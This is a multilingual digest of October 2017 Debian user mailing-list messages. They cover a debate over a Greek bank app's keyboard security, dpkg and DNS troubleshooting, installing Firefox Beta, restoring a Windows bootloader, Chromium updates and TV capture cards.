Re: je ne sais pas si je l'ai déjà posté mais je ne résiste pas, ...

[SB45730]

Bonjour,

Merci pour le lien. Je ne l'avais pas vu passer.

Cordialement.

Stéphane

Le 03/10/2017 à 18:46, Jean-Marc a écrit :
> «Nothing to Hide», le film.
> https://www.youtube.com/watch?v=djbwzEIv7gE
> 
> Jean-Marc 
> 

Re: Κενό ασφαλείας από Εθνική Τράπεζα Ελλάδος για Android

[Fotis Loukos]

On 10/03/2017 09:33 PM, Ioannis Proios wrote:
> Σε καμία περίπτωση δεν θέλω να προσβάλω κανένα ή να κρίνω την δουλειά του.
> Επειδή εδώ είναι μια λίστα συζήτησης που συχνάζω γι αυτό και έγινε το post.

Ούτε εγώ θέλω να προσβάλω κανένα λέγοντας *πριν κατηγορήσεις μία τράπεζα
ότι έχει κενό ασφαλείας πρέπει να είσαι σίγουρος ότι γνωρίζεις βασικά
στοιχεία ασφάλειας πληροφοριών*.

> 
> Αλλά αντί να συζητάμε και να προσπαθούμε να ανακαλύψουμε πάλι τον τροχό

Εννοείς να ανακαλύψεις πάλι τα keyboard; Νομίζω ότι αυτό είναι κάτι που
το προτείνεις εσύ...

> θα έπρεπε να πάρει θέση κάποιος υπεύθυνα και να κλείσει το θέμα.

Δεν υπάρχει θέμα για να το κλείσει κάποιος. Για παράδειγμα υπάρχει
γνωστή εφημερίδα που βγαίνει κάθε μέρα και λέει ότι ο Τσίπρας είναι
μασώνος, ο Μητσοτάκης κάνει θυσίες στον σατανά, και η Γεννηματά είναι
εξωγήινη. Πρέπει να βγαίνουν κάθε μέρα και να τα διαψεύδουν;

> Ελπίζω να το δω σύντομα και να μην το "θάψουν", και πραγματικά θα είναι
> τιμή τους να το τεκμηριώσουν κιόλας.

Γίνεσαι λίγο συνωμοσιολόγος. Δεν υπάρχει κανένα θέμα για να το "θάψουν".
Αν εσύ προσωπικά πιστεύεις ότι υπάρχει, δεν έχεις παρά να σταματήσεις να
χρησιμοποιείς το app. Για τον υπόλοιπο κόσμο του IT security είναι μια χαρά.
Επίσης σε παραπέμπω στο
https://www.pcisecuritystandards.org/documents/Mobile_Payment_Security_Guidelines_Developers_v1.pdf.

Φώτης

> 
> Αναμένουμε...
> 
> 
> Στις Τρί, 3 Οκτ 2017 στις 7:58 μ.μ., ο/η Fotis Loukos
> > έγραψε:
> 
> Θα συμφωνήσω απόλυτα μαζί σου. Είναι τεράστιο κενό ασφαλείας. Και
> μάλιστα, με μία μικρή έρευνα μπόρεσα να ανακαλύψω ένα σύνολο από
> διαφορετικά κενά, που προσωπικά θα με κάνουν να κλείσω τον
> λογαριασμό μου:
> 1) Αφήνουν τον χρήστη να χρησιμοποιήσει λειτουργικό σύστημα τρίτου
> (android) και δεν έχουν αναπτύξει δικό τους! Αν είναι δυνατόν! Ξέρεις
> πόσο εύκολο είναι να βάλεις τον κώδικα που έδωσες στο λειτουργικό
> σύστημα και να κλέψεις τα στοιχεία;
> 2) Αφήνουν τον χρήστη να χρησιμοποιήσει συσκευή τρίτου και δεν έχουν
> κάνει δικό τους κινητό τηλέφωνο! Απίστευτο! Εξίσου εύκολο σε hardware να
> καταφέρεις να καταγράψεις τα σημεία που έκανε touch ο χρήστης και να
> εξάγεις τον κωδικό του από αυτά! Πρέπει άμεσα να ανοίξουν εργοστάσια και
> να παράγουν τα πάντα μόνοι τους! Ούτε να ακούσω για αγορά επεξεργαστών
> από την αγορά, ξέρεις τι προβλήματα μπορούν να δημιουργηθούν στο supply
> chain; Δες για παράδειγμα στο παρελθόν την cisco και τα θέματα με
> την NSA.
> 
> Και τα προβλήματα δεν σταματάνε στο mobile app. Σκέψου το web banking
> τους. Αφήνουν τον χρήστη να χρησιμοποιεί δικό του browser και δεν έχουν
> γράψει οι ίδιοι έναν για να τον δίνουν στους πελάτες τους, αφήνουν τον
> χρήστη να χρησιμοποιεί δικό του driver για keyboard, δικό του
> λειτουργικό σύστημα, δικό του firmware (bios ή uefi), δικό του microcode
> για τον επεξεργαστή, και στην τελική δικό του hardware. Στο phone
> banking δεν θα πάω, δίκτυο τηλεφωνίας από την τράπεζα εδώ και τώρα!
> 
> Πέρα από την πλάκα, πρωτού πεις ότι κάτι είναι κενό ασφαλείας, πρέπει να
> εξετάσεις το threat model. Είναι απόλυτα αποδεκτό από την διεθνή
> κοινότητα να εμπιστεύεσαι το third party application για το
> πληκτρολόγιο. Αν κάποιος έχει την δυνατότητα να σου κάνει install ένα
> 'πειραγμένο' πληκτρολόγιο, και να έχει δικό της built-in πληκτρολόγιο η
> εφαρμογή έχεις χάσει το παιχνίδι. Στην τελική, σου κάνει install ένα app
> το οποίο έχει permissions να κάνει overlay (ίσως στέλνοντας τα κατάλληλα
> keystrokes από το ήδη εγκατεστημένο πληκτρολόγιο), δημιουργεί το overlay
> αυτό το οποίο είναι transparent και όταν βάζεις τον κωδικό στο
> πληκτρολόγιο της εφαρμογής απλά μαζεύει ότι γράφεις. Αυτός είναι ένας
> τρόπος που μου ήρθε στο μυαλό την ώρα που έγραφα το mail, μπορώ να σου
> πετάξω μερικές δεκάδες ακόμη.
> Επίσης μην νομίζεις ότι απλά έγραψαν ένα application και το δίνουν στον
> κόσμο. Υπάρχουν ειδικά standard βάση των οποίων όλα αυτά γίνονται audit.
> Δεν λέω ότι οι auditors θα βρουν τα πάντα, αλλά ένα τόσο χοντρό πρόβλημα
> (χρήση third party keyboard ενώ απαγορεύεται) θα το ανακάλυπταν στο
> λεπτό. Επίσης και τα standards μπορεί να μην είναι 100% σωστά, αλλά
> είναι widely accepted και όλοι λειτουργούν βάση αυτών.
> 
> Απλά λίγο προσοχή πριν γίνουν δηλώσεις της μορφής 'κενό ασφαλείας από
> εθνική τράπεζα'. Για να αναφέρεις κάτι τόσο χοντρό και να επιμένεις τόσο
> πολύ πρέπει να είσαι σίγουρος ότι γνωρίζεις καλά το αντικείμενο και δεν
> σου έχει ξεφύγει τίποτε. Στην συγκεκριμένη περίπτωση νομίζω ότι σου
> έχουν ξεφύγει μερικά πραγματάκια, γιατί με την λογική σου θα έπρεπε να
> απαιτήσεις να γράψουν τουλάχιστον ένα λειτουργικό για το κινητό.
> 
> My two cents,
> Φώτης
> 

Re: Prevent apt/dpkg from automatically enabling services during the upgrade process.

[cabezachumbo]

Dear debian friends.

The script that Reco wrote works very well. Thank you man.

P.S.: I am aware that I wrote bad the title of this thread. I mean to prevent 
apt/dpkg from automatically STARTING services, not from enabling. Actually it 
doesn't enable the disabled services, but it starts them.
 
Regards.

Re: Κενό ασφαλείας από Εθνική Τράπεζα Ελλάδος για Android

[John Tsiombikas]

On Tue, Oct 03, 2017 at 06:33:49PM +, Ioannis Proios wrote:
> Αλλά αντί να συζητάμε και να προσπαθούμε να ανακαλύψουμε πάλι τον τροχό θα
> έπρεπε να πάρει θέση κάποιος υπεύθυνα και να κλείσει το θέμα.
> Ελπίζω να το δω σύντομα και να μην το "θάψουν", και πραγματικά θα είναι
> τιμή τους να το τεκμηριώσουν κιόλας.

Pairno loipon ego thesi ypeythina kai kleino to thema legontas oti les
malakies. Parakato.

-- 
John Tsiombikas
http://nuclear.mutantstargoat.com/

Re: dpkg --configure -a

[Roberto C . Sánchez]

On Tue, Oct 03, 2017 at 10:12:28PM +0200, Peter Ries wrote:
> 
> 
> Hello!
> 
> 
> I have seen in the Internet, many people have the problem, that they get 
> following message:
> "E: dpkg was interrupted, you must manually run 'sudo dpkg --configure -a' to 
> correct the problem."
> 
> When runing the command: 'sudo dpkg --configure -a', then first it starts, 
> but it will not end in the Terminal.
> 
> Nothing changes on the Computer.
> 
> Followind commands are not able to execute: upgrade, purge, install and 
> similar.
> 
> 
> I also have got this trouble. On my Computer the problem was caused by 
> installing "apache2". I cannot remove it, because "purge" does not work.
> 
I find this to be unlikely.

> 
> I have seen in the Internet, many people gave an answere to help. But I did 
> not find any solution!
> 
> So I ask You to give me a way, how it could work. 
> 
Without seeing the precise error message from your console it will be
difficult to make any suggestions.  Please provide the complete output
you are seeing with the error message.

> My idea was only to reinstall Debian
> 
That seems a bit drastic.  There might be an easier solution.

Regards,

-Roberto

-- 
Roberto C. Sánchez

Re: SOLVED - Re: xfce4-terminal fails to “pass through” environment variables

[Zenaan Harkness]

On Tue, Oct 03, 2017 at 02:42:08PM +0200, to...@tuxteam.de wrote:
> On Tue, Oct 03, 2017 at 08:31:59AM -0400, Greg Wooledge wrote:
> > On Tue, Oct 03, 2017 at 08:35:43AM +0200, to...@tuxteam.de wrote:
> > > This, dear reader assumes you are reading in monospace (Zenaan, I
> > > know you do, but think of those poor souls bound to a Web interface ;-)
> > 
> > They are already in hell.  Nothing I can do to save them.
> > 
> > > > ← ↑ ↓ → ⋱ ⋰ ⇄ ※
> > >   * *   *
> > > 
> > > > ⨡ ⨠ ⨟ ⋿ ⦂ ⊙ ⦀ ∣ ⇉ ↦ ⨾
> > >   * * * * *   *   *
> > > 
> > > > ⟩ ⟨ ❵ ❴ ¦ ‖ ¡ ‼ µ ♮ ♯
> > > 
> > > 
> > > > π ∞ ‡ ♥ ∑ ⁽ ⁾ ₎ ₍ ∙
> > > 
> > > 
> > > > … † ° ¤ № ¶ — ≡ ± ⫶ ∴
> > > *
> > > 
> > > (that makes roughly 20% failure rate on your sample, whatever
> > > that means).
> > 
> > My results in screen-inside-urxvt match yours with one exception: the
> > last character on the first line appears as a symmetric pattern of lines
> > and dots for me.
> 
> Ah, yes. That's what Emacs shows too. It's "REFERENCE MARK", kind of
> an X with four dots within the spaces between the arms

https://en.wikipedia.org/wiki/%E2%80%BB
Komejirushi
The komejirushi (※; Japanese: こめじるし or 米印) is a punctuation
mark, that is used in Japanese and in Korean (known as 참고표). The
name literally means "rice symbol", indicating the similarity to the
kanji for rice; 米.
It is used to call attention to an important sentence or thought,
like a prologue or footnote. In contrast to the European asterisk, it
is not used for connecting a specific place in the text directly to
the footnote, but rather for notes directly before or after the
passage.
In Unicode the komejirushi is available at code point U+203B
"REFERENCE MARK". The symbol is also used to denote contradictions in
mathematical proofs.


> > Before this thread, I didn't know Debian's xterm had come so far.
> > That's surely a good thing.
> 
> Tell *me*. Things I'm infinitely thankful for.
> 
> Cheers
> -- tomás
> 

Re: Firefox Beta en Debian Testing

[Miguel Matos]

2017-10-02 4:52 GMT-04:00 rv riveravaldez :
> Qué tal,
>
> estoy instalando Debian Testing en un par de máquinas y veo que la
> versión de firefox que viene por defecto es firefox-esr (que entiendo
> que es Firefox Stable).
>
> ¿Alguien puede confirmar si este sitio y las instrucciones que
> describe son oficiales de Debian y están actualizadas?
>
> https://mozilla.debian.net/
>
> La intención es instalar Firefox Beta.
>
> Gracias, ¡saludos!
>

No me queda claro de lo que buscas hacer, así que intentaré
especificar mis únicas opciones: antes de pasarme a debian testing
tenía instalado jessie desde cero, pero como sabía que la versión de
firefox estaba desactualizada, me bajé el binario, lo extraje en el
directorio /opt y le hice la jugada para que fuese el navegador por
defecto, y luego agregué el enlace al menú aplicaciones. Pero siempre
era un rollo actualizar con root, hasta que descubrí que se podía usar
la jugada sucia de hacer el directorio usable por mi usuario, y de
ahí, siempre actualizo a la versión más reciente, y yo estoy en Debian
Testing (buster).

-- 

Ayuda para hacer preguntas inteligentes: http://is.gd/NJIwRz

Re: Can't find the DNS Servers

[Gary Roach]

On 10/03/2017 03:53 PM, David Wright wrote:

On Tue 03 Oct 2017 at 13:30:11 (-0700), Gary Roach wrote:

OK Rico> I followed your instructions and still have the same
problem. Attached are the new files. Already installed were
isc-dhcp-client and resolvconf. You are right about the br1 entry
not being needed. the virtual machine works fine without it.


Perhaps you need to rereport your symptoms. Indeed, report them
at all: you said ping worked; pinging what? Can you ping the
loopback? the router? other local hosts, by number or by name?
8.8.8.8? "The same problem" doesn't cut it. At least you've now
got the external nameservers in your resolv.conf. And does your
router do DNS or not?

Cheers,
David.


Symptoms: Any package that needs access to the network sends an error 
message indicating that it doesn't have access to the internet. Ping 
doesn't work for names but does for ip addresses. All ip addresses both 
local and global.


In short, there doesn't seem to be any access to a name server. My 
believe that my Actiontec router at 192.168.1.1 also acts as a name server.


Thanks for the help

Gary R

Re: Firefox Beta en Debian Testing

[divagante]

El 02/10/17 a las 18:53, Felix Perez escribió:

El 2 de octubre de 2017, 17:19, rv riveravaldez
 escribió:

2017-10-02 16:47 GMT-03:00 Gustavo Castro :

En testing firefox-esr es esta como virtual y apunta a firefox, lo que
puedes hacer es desinstalar e intalar de nuevo firefox. antes de todo
deberías actualizar por que creo que estas con la instalación de estable sin
actualizar testing

apt update

apt full-upgrade

saludos

El 02/10/17 a las 13:11, Guillermo Cordeiro escribió:

On 17-10-02 13:16:33, rv riveravaldez wrote:

2017-10-02 12:00 GMT-03:00 Guillermo Cordeiro :

On 17-10-02 05:52:02, rv riveravaldez wrote:


Qué tal,

estoy instalando Debian Testing en un par de máquinas y veo que la
versión de firefox que viene por defecto es firefox-esr (que entiendo
que es Firefox Stable).

¿Alguien puede confirmar si este sitio y las instrucciones que
describe son oficiales de Debian y están actualizadas?

https://mozilla.debian.net/

La intención es instalar Firefox Beta.

Gracias, ¡saludos!



Hola.

Con una simple búsqueda en google encontrarás información sobre el ESR
de Firefox.

No se cual es la versión que está actualmente en Beta, pero puedes ver
la versión que instalarás si buscas en la página de paquetes de Debian:


https://packages.debian.org/search?keywords=firefox=names=all=all=mozilla-search

Un saludo.


Hola, Guillermo.

1. Me respondiste a mi mail y no a la lista, te aviso.


XD. Me colé. XD

2. Ya tenía la información sobre el ESR de Firefox, no es eso lo que
preciso.

3. Ya sé qué versión instala por defecto Debian en cada una de sus ramas.


4. El link que me pasaste muestra justamente que versiones superiores
a la de firefox-esr están sólo disponibles por defecto en sid y
experimental.


5. Mi pregunta es sobre este sitio: https://mozilla.debian.net/ - ¿Es
oficial de Debian? ¿Sus instrucciones están actualizadas?


El paquete firefox-esr es diferente a firefox, supongo que para
diferenciar entre las versiones ESR y las intermedias. La versión de
firefox-esr no debiera ser muy diferente de una a otra rama, igual los
15 días de testeo entre sid y buster.

Ya vi que te respondieron que sí. El enlace a Debian Packages es para
que vieses las versiones del paquete firefox,
Un saludo.



El sistema está actualizado: firefox-esr - 52.3.0esr-2

Si miran en los paquetes de debian van a ver que versiones más nuevas
sólo hay en sid y experimental.

El asunto es que no encontré algún link desde el sitio de debian (por
eso decía, 'oficial') que apuntara a: https://mozilla.debian.net/

Como para quedarme tranquilo que podía usar ese repositorio.


Yo no me quedaría tan tranquilo al mezclar repos de testing y
experimental, sobre todo si no sabes lo que estás haciendo.
El repo es oficial:

deb http://http.debian.net/debian experimental main

Saludos.





EXACTAMENTE!! nada tranquilo mezclando repositorios... que luego 
llamamos a los dolores cabeza y fatigosas reinstalaciones.
 Aca te podes leer esto y ver como manejar el pinning de todo el 
sistema o de un paquete, en este caso frefox.

https://wiki.debian.org/es/AptPreferences

 O manejas bien el apt-pinning, o tambien podrias...

Agregar el repositorio sid o experimental, actualizar, instalar 
solamente el dichoso firefox mas reciente y luego -o sin olvido 
mediante- quitas el repositorio sid/experimental y actualizar nuevamente 
para que todo quede en orden.


 Me parece que es mas sencillo bajar el binario de firefox, y 
arreglárselas para que quede marca del ejecutable en /usr/bin y otros 
enlaces a los menues de tu escritorio.
 Por norma nomas, la carpeta contenedora de los binarios la podes 
colocar en /opt, pero en realidad donde te plazca mejor.

 Saludos.

Re: Can't find the DNS Servers

[David Wright]

On Tue 03 Oct 2017 at 13:30:11 (-0700), Gary Roach wrote:
> OK Rico> I followed your instructions and still have the same
> problem. Attached are the new files. Already installed were
> isc-dhcp-client and resolvconf. You are right about the br1 entry
> not being needed. the virtual machine works fine without it.

Perhaps you need to rereport your symptoms. Indeed, report them
at all: you said ping worked; pinging what? Can you ping the
loopback? the router? other local hosts, by number or by name?
8.8.8.8? "The same problem" doesn't cut it. At least you've now
got the external nameservers in your resolv.conf. And does your
router do DNS or not?

Cheers,
David.

Re: remettre windows

[lou]

Le Tue, 03 Oct 2017 22:38:07 +0200,
zulian  a écrit :

> Le mardi 3 octobre 2017, 17:28:33 CEST Pascal Hambourg a écrit :
> > Le 03/10/2017 à 17:11, hamster a écrit :  
> > > Quelqu'un a qui j'ai installé débian en double boot n'est pas
> > > séduit par le bidule et me demande de lui remettre l'ordi avec
> > > uniquement windows. Je me fais un point d'honneur a satisfaire sa
> > > demande, seulement voila : si je vire debian, grub ne marche
> > > plus.  
> > 
> > Normal, un gros bout de GRUB était installé dans /boot.
> > Je suppose que tu avais installé GRUB dans le MBR ?
> > Sinon, si tu avais installé GRUB dans le secteur d'amorce d'une
> > partition et mis le drapeau d'amorçage sur celle-ci, il suffit de
> > déplacer le drapeau d'amorçage sur la partition Windows avec
> > n'importe quel partitionneur.
> >   
> > > Une solution serait de restaurer le bootloader de windows, mais
> > > je sais pas faire.  
> > 
> > Moi non plus. J'ai entendu parler de fixboot et fixmbr avec un CD
> > ou DVD d'installation de Windows, mais jamais fait.  
> 
> Couic 
> 
> 
> Hou la la, 
> 
> Pour des problèmes Windows choisir des outils Microsoft.
> 
> Tu "boot" sur ton  joli DVD win 10 --> F8 --> options avancées --->
> 
> La, essayes d'abord en mode console  Bootrec.exe. 
> Généralement c'est le bonheur, ton système "reboote" tout propre.
> 
> Si cela ne fonctionne pas (et parfois il ne veut rien savoir) alors
> la seule solution est de choisir  la réinstallation complète. 
> 
> Tester et approuver sur de nombreuses configs.
> 
> Oups, désolé, un moment d'égarement, j'ai oublié que je poste sur
> debian- user-french.
> 
> --
> 
> Frédéric ZULIAN
> 

Juste une précision Me semble que le bootloader de windows c'est
bootsect et non bootrec

a+

Re: Rien ne se passe après Grub2...oops oubliez la pièce jointe dans le dernier message...

[lou]

Le Tue, 3 Oct 2017 17:16:17 +0200,
Sébastien NOBILI  a écrit :

> Le mardi 03 octobre 2017 à 10:48, louis a écrit :
> > Pensez-vous que le screenshot en PJ a à voir avec ce problème?  
> 
> Aaaah, voilà la pièce-jointe :D
> 
> Le « -.mount » est étrange… Un problème avec le contenu de fstab ou
> bien un problème d’interprétation de son contenu par Systemd.
> 
> Pourrais-tu nous envoyer le contenu du fichier « /etc/fstab » de ton
> système Debian (pas celui du LiveCD).
> 
> Si tu as des mots de passe dedans, efface-les avant.
> 
> Sébastien
> 

J'aimerais savoir ce que fait l'option du noyau "noresume" ?? et si je
peux laisser l'option au noyau...?
Parce que, maintenant, je peux entrer dans ma debian :))
MERCI!

Je poste quand même mon fstab... parce que je comprend toujours pas
pourquoi j'étais bloqué au démarrage.???..

Je n'est pas de double entrer UUID ou 2 swap et tout semble normale
pour ma part. J'ai une ligne commenter et s'est une partition chiffré
que je monte au moment où je suis dans ma debian et non au boot. 

> vous n'auriez pas branché un disk ou une vm ou un tail ou une usb
> chiffrée avant en oubliant de déconnectez correctement ?
> ou alors une manipulation de fichiers .conf mal sauvegardée ?
> ou un service par init /systemd toujours ouvert ? fermez le service :
> stop
J'avais une clé usb d'insérée au moment ou j'ai redémarré la machine et
je l'ai pas déconnectée avant le redémarrage j'ai souvent fait ça
et  j'ai jamais eu de soucidevrais-je?

Merci à vous 2 Sebastien & Mizett

Et oui mailoo marche toujours, mais je sais pas pour combien de
temps! ;-)

le fstab est en pièce jointe :D

Re: remettre windows

[zulian]

Le mardi 3 octobre 2017, 17:28:33 CEST Pascal Hambourg a écrit :
> Le 03/10/2017 à 17:11, hamster a écrit :
> > Quelqu'un a qui j'ai installé débian en double boot n'est pas séduit par
> > le bidule et me demande de lui remettre l'ordi avec uniquement windows.
> > Je me fais un point d'honneur a satisfaire sa demande, seulement voila :
> > si je vire debian, grub ne marche plus.
> 
> Normal, un gros bout de GRUB était installé dans /boot.
> Je suppose que tu avais installé GRUB dans le MBR ?
> Sinon, si tu avais installé GRUB dans le secteur d'amorce d'une
> partition et mis le drapeau d'amorçage sur celle-ci, il suffit de
> déplacer le drapeau d'amorçage sur la partition Windows avec n'importe
> quel partitionneur.
> 
> > Une solution serait de restaurer le bootloader de windows, mais je sais
> > pas faire.
> 
> Moi non plus. J'ai entendu parler de fixboot et fixmbr avec un CD ou DVD
> d'installation de Windows, mais jamais fait.

Couic 


Hou la la, 

Pour des problèmes Windows choisir des outils Microsoft.

Tu "boot" sur ton  joli DVD win 10 --> F8 --> options avancées --->

La, essayes d'abord en mode console  Bootrec.exe. 
Généralement c'est le bonheur, ton système "reboote" tout propre.

Si cela ne fonctionne pas (et parfois il ne veut rien savoir) alors
la seule solution est de choisir  la réinstallation complète. 

Tester et approuver sur de nombreuses configs.

Oups, désolé, un moment d'égarement, j'ai oublié que je poste sur  debian-
user-french.

--

Frédéric ZULIAN

Re: Can't find the DNS Servers

[Gary Roach]

OK Rico> I followed your instructions and still have the same problem. 
Attached are the new files. Already installed were isc-dhcp-client and 
resolvconf. You are right about the br1 entry not being needed. the 
virtual machine works fine without it.


Gary R
# This file describes the network interfaces available on your system
# and how to activate them. For more information, see interfaces(5).


## The loopback network interface
auto lo
iface lo inet loopback

##The primary network interface
auto enp4s0
iface enp4s0 inet dhcp
  dns-nameserver 8.8.8.8
  dns-nameserver 8.8.4.4


##The bridge network interface to qemu virtual machine
#auto br1
#iface br1 inet dhcp
#   bridge_ports br1
#   bridge_stp off
#   bridge_fd 0.0


default 0.0.0.0
loopback127.0.0.0
link-local  169.254.0.0

# Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8)
# DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN
nameserver 192.168.1.1
nameserver 8.8.8.8
nameserver 8.8.4.4
search home
1: lo:  mtu 65536 qdisc noqueue state UNKNOWN group 
default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
   valid_lft forever preferred_lft forever
inet6 ::1/128 scope host 
   valid_lft forever preferred_lft forever
2: enp4s0:  mtu 1500 qdisc pfifo_fast state UP 
group default qlen 1000
link/ether 4c:cc:6a:87:fb:5d brd ff:ff:ff:ff:ff:ff
inet 192.168.1.6/24 brd 192.168.1.255 scope global dynamic enp4s0
   valid_lft 84574sec preferred_lft 84574sec
inet6 fe80::5447:c98c:3f23:efe8/64 scope link 
   valid_lft forever preferred_lft forever
3: virbr0:  mtu 1500 qdisc noqueue state 
DOWN group default qlen 1000
link/ether 52:54:00:d1:d9:de brd ff:ff:ff:ff:ff:ff
inet 192.168.122.1/24 brd 192.168.122.255 scope global virbr0
   valid_lft forever preferred_lft forever
4: virbr0-nic:  mtu 1500 qdisc pfifo_fast master virbr0 
state DOWN group default qlen 1000
link/ether 52:54:00:d1:d9:de brd ff:ff:ff:ff:ff:ff
default via 192.168.1.1 dev enp4s0 proto static metric 100 
192.168.1.0/24 dev enp4s0 proto kernel scope link src 192.168.1.6 metric 100 
192.168.122.0/24 dev virbr0 proto kernel scope link src 192.168.122.1 linkdown 

dpkg --configure -a

[Peter Ries]

Hello!


I have seen in the Internet, many people have the problem, that they get 
following message:
"E: dpkg was interrupted, you must manually run 'sudo dpkg --configure -a' to 
correct the problem."

When runing the command: 'sudo dpkg --configure -a', then first it starts, but 
it will not end in the Terminal.

Nothing changes on the Computer.

Followind commands are not able to execute: upgrade, purge, install and similar.


I also have got this trouble. On my Computer the problem was caused by 
installing "apache2". I cannot remove it, because "purge" does not work.


I have seen in the Internet, many people gave an answere to help. But I did not 
find any solution!

So I ask You to give me a way, how it could work. 

My idea was only to reinstall Debian


Best regards 
Peter

Re: Security updates for Chromium on Debian Jessie

[Daniel Bareiro]

Hi, Alex.

On 29/09/17 07:19, Alex ARNAUD wrote:

 In the last DSA for the chromium-browser package (DSA-3985-1) I noticed
 that the updates were released for stable, testing and unstable but not
 for oldstable. I think the same thing happened with the previous
 update.

 Maybe I'm missing something and Chromium on Jessie is no longer getting
 security updates?

>>> It seems that the maintainer is overworked and cannot provide Jessie
>>> updates for chromium anymore[1].  Somebody else said he might be looking
>>> at it[2], but that was six weeks ago and nothing happened so far.
>>>
>>> So while it is not clear when chromium in jessie will be EOL'ed, it
>>> seems advisable to switch to some other browser for now (if you want a
>>> package from Debian, firefox-esr is the only option).
>>>
>>>
>>> 1. https://lists.debian.org/debian-security/2017/07/msg9.html
>>> 2. https://lists.debian.org/debian-security/2017/08/msg00010.html

>> Thanks for the observation and the references. I was not aware of this.
>>
>> Here I am using both Firefox and Chromium since sometimes I need to test
>> some things in both browsers (for example some WebRTC application such
>> as Jitsi Meet).

> You can also install Google Chrome from the Google Debian repository.
> It's up-to-date and it works for Jessie.

Thanks for the suggestion. I did not know they had a repository
published. The times I installed Chrome were downloading the Debian
package. But maybe this automatically adds an entry in
/etc/apt/source.list.d.


Kind regards,
Daniel



signature.asc
Description: OpenPGP digital signature

Re: v4l2 cameras in stretch.

[deloptes]

pe...@easthope.ca wrote:

> * From: deloptes 
> * Date: Tue, 03 Oct 2017 09:19:29 +0200
>> I was using Haupauge PVR like 10y ago.
> 
> Yikes! This is a WinTV, NTSC/NTSC-J 26552 REV F0A3 LF.
> http://easthope.ca/HauppaugeWinTV.jpg
> 
>> http://www.hauppauge.com/site/support/linux.html
> 
> These models are mentioned.
> * WinTV-HVR-955Q
> * WinTV-dualHD (all models)
> * WinTV-quadHD (all models)
> * WinTV-soloHD (DVB T/T2/C)
> * WinTV-HVR-1255 and WinTV-HVR-1265
> 
> Any similarity to the WinTV, NTSC/NTSC-J 26552? Is it older or newer?
> 
> With this model being different from any mentioned in the documents
> and a 4.9.0-3-686-pae kernel here versus 4.2 referenced by  Hauppauge,
> dormant rot (https://en.wikipedia.org/wiki/Software_rot#Dormant_rot)
> is the concern.  I can submit a bug report but maintainers won't
> necessarily have time for a goose chase.
> 
>> https://ubuntuforums.org/showthread.php?t=1634445
> 
> It addresses the WinTV PVR-150.  Again I have no idea of similarity to
> this adapter.
> 
> Will investigate the NTSC vs. PAL question before pursuing software
> further.
> 
> Thanks for the reply,   ... Peter E.


$ apt-cache show ivtv-utils
Package: ivtv-utils
Source: ivtv-utils (1.4.1-2)
Version: 1.4.1-2+b2
Installed-Size: 400
Maintainer: Debian MythTV Team

Architecture: amd64
Depends: libc6 (>= 2.14), libgcc1 (>= 1:3.0), libstdc++6 (>= 4.1.1),
perl:any, libconfig-inifiles-perl, libvideo-ivtv-perl,
libvideo-capture-v4l-perl, v4l-utils
Recommends: perl-tk, devscripts, fakeroot, unzip
Description-en: utilities for use with the ivtv kernel driver
 The IVTV project develops a kernel driver for Linux and a driver for
 X11 for hardware based on Conexant's CX23415/CX23416 codec chip such
 as the Hauppauge PVR 150/250/350/500 models and other supported hardware.

there is also firmware-ivtv and xserver-xorg-video-ivtv. I htink you have
those, but who knows. I would try this way anyway

Try using following to grab the camera

mplayer -fps 10 -tv driver=v4l2:width=640:height=480:device=/dev/video0
tv://

-fps in my case 10 is compromise - you can try higher values

note v4l2 ;-)

regards

je ne sais pas si je l'ai déjà posté mais je ne résiste pas, ...

[Jean-Marc]

«Nothing to Hide», le film.
https://www.youtube.com/watch?v=djbwzEIv7gE

Jean-Marc 


pgpX2ss96KbVG.pgp
Description: PGP signature

connectivity checks

[Pol Hallen]

Hi all :-)

is there a tool (like a daemon that keep logs file) to check the 
connectivity of DSL?


thanks for help!

Pol

Re: mail et reply

[Pierre L.]

Haha!
Les gens qui prônent le libre et qui ne veulent pas voir que la liberté
est justement de pouvoir utiliser ce que l'on veut !
Sans offense ;)
Bien à vous.


Le 03/10/2017 à 15:52, David - DCPC a écrit :
> Quand au "conseil" sur gmail, je le prendrais tel quel, mais me
> permettrai de l'ignorer, ayant qd même le choix pour gérer mes emails,
> surtout qu'il fonctionne très bien depuis de nombreuses années avec
> des centaines de contacts tant personnels que professionnels. Et que
> je ne semble pas être le seul à en être très satisfait.




signature.asc
Description: OpenPGP digital signature

Re: Κενό ασφαλείας από Εθνική Τράπεζα Ελλάδος για Android

[Ioannis Proios]

Σε καμία περίπτωση δεν θέλω να προσβάλω κανένα ή να κρίνω την δουλειά του.
Επειδή εδώ είναι μια λίστα συζήτησης που συχνάζω γι αυτό και έγινε το post.

Αλλά αντί να συζητάμε και να προσπαθούμε να ανακαλύψουμε πάλι τον τροχό θα
έπρεπε να πάρει θέση κάποιος υπεύθυνα και να κλείσει το θέμα.
Ελπίζω να το δω σύντομα και να μην το "θάψουν", και πραγματικά θα είναι
τιμή τους να το τεκμηριώσουν κιόλας.

Αναμένουμε...


Στις Τρί, 3 Οκτ 2017 στις 7:58 μ.μ., ο/η Fotis Loukos 
έγραψε:

> Θα συμφωνήσω απόλυτα μαζί σου. Είναι τεράστιο κενό ασφαλείας. Και
> μάλιστα, με μία μικρή έρευνα μπόρεσα να ανακαλύψω ένα σύνολο από
> διαφορετικά κενά, που προσωπικά θα με κάνουν να κλείσω τον λογαριασμό μου:
> 1) Αφήνουν τον χρήστη να χρησιμοποιήσει λειτουργικό σύστημα τρίτου
> (android) και δεν έχουν αναπτύξει δικό τους! Αν είναι δυνατόν! Ξέρεις
> πόσο εύκολο είναι να βάλεις τον κώδικα που έδωσες στο λειτουργικό
> σύστημα και να κλέψεις τα στοιχεία;
> 2) Αφήνουν τον χρήστη να χρησιμοποιήσει συσκευή τρίτου και δεν έχουν
> κάνει δικό τους κινητό τηλέφωνο! Απίστευτο! Εξίσου εύκολο σε hardware να
> καταφέρεις να καταγράψεις τα σημεία που έκανε touch ο χρήστης και να
> εξάγεις τον κωδικό του από αυτά! Πρέπει άμεσα να ανοίξουν εργοστάσια και
> να παράγουν τα πάντα μόνοι τους! Ούτε να ακούσω για αγορά επεξεργαστών
> από την αγορά, ξέρεις τι προβλήματα μπορούν να δημιουργηθούν στο supply
> chain; Δες για παράδειγμα στο παρελθόν την cisco και τα θέματα με την NSA.
>
> Και τα προβλήματα δεν σταματάνε στο mobile app. Σκέψου το web banking
